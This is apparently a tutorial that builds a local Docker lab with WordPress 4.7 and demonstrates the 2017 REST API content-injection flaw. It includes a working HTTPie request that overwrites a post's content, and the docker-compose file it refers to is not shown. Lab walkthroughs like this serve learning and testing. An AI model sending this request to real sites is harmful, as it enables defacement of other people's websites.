We will create a quick PoC for an exploit for a wordpress vulnerability. I’ll be emphasizing more on the process than the vulnerability itself. For this demo, we will be exploiting an old content injection vulnerability. You can read about its technical details here, https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.
In short, the exploit only requires to send a rest API call to the wordpress application.
To stage the demo, we will:
- Setup a container that runs vulnerable version of WordPress-4.7. We’ll create a wordpress/mysql stack with docker compose.
- Make an HTTP POST request with a new content that overwrites the original post. I will use HTTPie tool. You may choose any tool you’re familiar with, eg: curl, Postman, Insomnia.
- You must have Docker already installed. Running the command “docker version” from CLI should return server version.
- You have an HTTP client that can make json HTTP post. I already have HTTPie on my Mac. I installed with “brew install httpie”
Create a directory.
Save the following file as ‘docker-compose.yml’:
Within the same directory run the following command:
$ docker-compose up --force-recreate; docker-compose down -v
You should see Docker downloading images and spinning up the servers. Once finished you should be able to browse to http://localhost:8080 from your browser. Follow the instructions to finish the installation (by entering site name, username, password, fake email). Then you will see the admin dashboard. Go to Settings > Permalinks and choose the second option to enable pretty links. Open another browser window or new tab and browse to http://localhost:8080 again. You should see your blog and a Hello World post.
To start exploit, run the following command from the shell/terminal to overwrite the post content.
$ http -f POST localhost:8080/wp-json/wp/v2/posts/1/\?id=123abc \
content:=\"This website has been hacked\"
Now browse the site again and observe the “Hello World” blog post content has changed.
To end the PoC, press Ctrl+C on the docker-compose terminal.